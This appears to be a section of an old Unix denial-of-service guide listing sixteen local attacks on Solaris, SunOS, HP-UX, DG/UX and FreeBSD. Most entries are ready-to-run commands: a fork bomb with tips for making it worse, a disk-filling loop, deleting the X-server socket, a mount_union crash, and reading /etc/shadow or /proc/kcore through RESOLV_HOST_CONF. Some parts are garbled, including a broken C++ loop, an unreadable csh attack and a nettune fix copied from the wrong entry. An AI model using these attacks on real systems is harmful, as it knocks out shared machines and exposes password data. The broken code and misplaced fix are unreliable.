|
|
|
|
.D. ATTACKING FROM THE INSIDE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .D.1. KERNEL PANIC UNDER SOLARIS 2.3 ------------------------------------ Solaris 2.3 will get a kernel panic if this is executed: EX: $ndd /dev/udp udp_status The solution is to install the proper patch. .D.2. CRASHING THE X-SERVER --------------------------- If stickybit is not set in /tmp then can the file /tmp/.x11-unix/x0 be removed and the x-server will crash. Ex: $ rm /tmp/.x11-unix/x0 .D.3. FILLING UP THE HARD DISK ----------------------------- If your hard disk space is not limited by a quota or if you can use /tmp then it`s possible for you to fill up the file system. Ex: while : ; mkdir .xxx cd .xxx done .D.4. MALICIOUS USE OF eval --------------------------- Some older systems will crash if eval '\!\!' is executed in the C-shell. Ex: % eval '\!\!' .D.5. MALICIOUS USE OF fork() ----------------------------- If someone executes this C++ program the result will result in a crash on most systems. Ex: #include <sys/types.h> #include <unistd.h> #include <iostream.h> main() { int x; while(x=0;x<1000000;x++) { system("uptime"); fork(); } } You can use any command you want, but uptime is nice because it shows the workload. To get a bigger and very ugly attack you should however replace uptime (or fork them both) with sync. This is very bad. If you are real mean you could also fork a child process for every child process and we will get an exponential increase of workload. There is no good way to stop this attack and similar attacks. A solution could be to place a limit on time of execution and size of processes. .D.6. CREATING FILES THAT IS HARD TO REMOVE ------------------------------------------- Well all files can be removed, but here is some ideas: Ex.I. $ cat > -xxx ^C $ ls -xxx $ rm -xxx rm: illegal option -- x rm: illegal option -- x rm: illegal option -- x usage: rm [-fiRr] file ... $ Ex.II. $ touch xxx! $ rm xxx! rm: remove xxx! (yes/no)? y $ touch xxxxxxxxx! $ rm xxxxxxxxx! bash: !": event not found $ (You see the size do count!) Other well know methods is files with odd characters or spaces in the name. These methods could be used in combination with ".D.3 FILLING UP THE HARDDISK". If you do want to remove these files you must use some sort of script or a graphical interface like OpenWindow:s File Manager. You can also try to use: rm ./<filename>. It should work for the first example if you have a shell. .D.7. DIRECTORY NAME LOOKUPCACHE -------------------------------- Directory name lookupcache (DNLC) is used whenever a file is opened. DNLC associates the name of the file to a vnode. But DNLC can only operate on files with names that has less than N characters (for SunOS 4.x up to 14 character, for Solaris 2.x up 30 characters). This means that it's dead easy to launch a pretty discreet denial of service attack. Create lets say 20 directories (for a start) and put 10 empty files in every directory. Let every name have over 30 characters and execute a script that makes a lot of ls -al on the directories. If the impact is not big enough you should create more files or launch more processes. .D.8. CSH ATTACK ---------------- Just start this under /bin/csh (after proper modification) and the load level will get very high (that is 100% of the cpu time) in a very short time. Ex: |I /bin/csh nodename : **************b .D.9. CREATING FILES IN /tmp ---------------------------- Many programs creates files in /tmp, but are unable to deal with the problem if the file already exist. In some cases this could be used for a denial of service attack. .D.10. USING RESOLV_HOST_CONF ----------------------------- Some systems have a little security hole in the way they use the RESOLV_HOST_CONF variable. That is we can put things in it and through ping access confidential data like /etc/shadow or crash the system. Most systems will crash if /proc/kcore is read in the variable and access through ping. Ex: $ export RESOLV_HOST_CONF="/proc/kcore" ; ping asdf .D.11. SUN 4.X AND BACKGROUND JOBS ---------------------------------- Thanks to Mr David Honig <honig@amada.net> for the following: " Put the string "a&" in a file called "a" and perform "chmod +x a". Running "a" will quickly disable a Sun 4.x machine, even disallowing (counter to specs) root login as the kernel process table fills." " The cute thing is the size of the script, and how few keystrokes it takes to bring down a Sun as a regular user." .D.12. CRASHING DG/UX WITH ULIMIT --------------------------------- ulimit is used to set a limit on the system resources available to the shell. If ulimit 0 is called before /etc/passwd, under DG/UX, will the passwd file be set to zero. .D.13. NETTUNE AND HP-UX ------------------------ /usr/contrib/bin/nettune is SETUID root on HP-UX meaning that any user can reset all ICMP, IP and TCP kernel parameters, for example the following parameters: - arp_killcomplete - arp_killincomplete - arp_unicast - arp_rebroadcast - icmp_mask_agent - ip_defaultttl - ip_forwarding - ip_intrqmax - pmtu_defaulttime - tcp_localsubnets - tcp_receive - tcp_send - tcp_defaultttl - tcp_keepstart - tcp_keepfreq - tcp_keepstop - tcp_maxretrans - tcp_urgent_data_ptr - udp_cksum - udp_defaultttl - udp_newbcastenable - udp_pmtu - tcp_pmtu - tcp_random_seq The solution could be to set the proper permission on /sbin/mount_union: #chmod u-s /sbin/mount_union .D.14. SOLARIS 2.X AND NFS -------------------------- If a process is writing over NFS and the user goes over the disk quota will the process go into an infinite loop. .D.15. SYSTEM STABILITY COMPROMISE VIA MOUNT_UNION -------------------------------------------------- By executing a sequence of mount_union commands any user can cause a system reload on all FreeBSD version 2.X before 1996-05-18. $ mkdir a $ mkdir b $ mount_union ~/a ~/b $ mount_union -b ~/a ~/b The solution could be to set the proper permission on /sbin/mount_union: #chmod u-s /sbin/mount_union .D.16. trap_mon CAUSES KERNEL PANIC UNDER SUNOS 4.1.X ---------------------------------------------------- Executing the trap_mon instruction from user mode can cause a kernel panic or a window underflow watchdog reset under SunOS 4.1.x, sun4c architecture. [UP] |
|
|
|
